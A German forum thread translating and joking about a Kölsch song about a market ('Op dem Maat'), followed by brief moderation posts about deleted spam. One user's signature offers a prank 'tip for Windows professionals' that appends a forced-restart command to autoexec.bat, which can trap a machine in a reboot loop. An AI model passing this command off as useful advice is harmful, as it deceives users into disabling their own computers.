suche bedeutung eines wortes


Seite: 1 2
Autor Beitrag
ixiter
15.07.08 - 04:24:46 Uhr

Ja, ich weiß, der Thread ist uralt. Egal!
Ich bin drauf gestoßen als ich in der Pytalsuche nach "Köln" gesucht habe.
Ich musste herzhaft lachen, als ich Manifestos "Übersetzung" gelesen habe.
"fuhle" heißt auch hier "faule"

Op dem Maat, op dem Maat, stonn die Buure,
Decke Eier, fuhle Prumme, lange Muhre.
Un die Lück, un die Lück, sin am luure,
op die Eier, op die Prumme, op die Muhre.

Auf dem Markt, auf dem Markt, steh'n die Bauern.
Dicke Eier, faule Pflaumen, lange Möhren.
Und die Leute, und die Leute, sind am starren,
auf die Eier, auf die Pflaumen, auf die Möhren.

Dem Nichtkölner mag sich der Wortwitz und der tiefgründige Sinn der Zeilen nicht erschließen.
Glaubts mir einfach .. es ist ein lustiges schönes Mitgröhllied.

Erläuterung:
"sin am luure" = "sind am starren" .. ja, das sagt man auf Kölsch so. Kölsch ist nicht Deutsch!

"Decke Eier, fuhle Prumme, lange Muhre." = "Dicke Eier, faule Pflaumen, lange Möhren."
manch einer mag den Sexismus in dieser Zeile erkennen

so .. dass musste gesagt werden.
Bleibt die Frage, was Manifesto unter "vollen Pflaumen" versteht ?!?!

________________
Durchsuch die Pytal Userseiten
Tipp für Windows Profis: echo >>c:\autoexec.bat shutdown -r -f -t 0
SammysHP
10.11.11 - 14:09:23 Uhr

Kann mal jemand diesen Spam und den Benutzer löschen?

Danke!

_________________
www.sammyshp.de
rainer
10.11.11 - 15:23:58 Uhr

Erledigt.
Achtzig
10.11.11 - 16:55:40 Uhr

Hmm, jetzt sollte man aber vielleicht noch anmerken, daß zwischen ixiters und SammysHP Beitrag noch ein anderer Beitrag war. Wenn man das jetzt so liest, könnte man meinen, ixiter spammt und wurde gelöscht (wenn man nicht wüßte, daß dann Abgemeldet da steht)
Seite: 1 2

- Obige Beiträge stellen keine Äußerung oder Meinung von Pytal oder dessen Betreiber dar -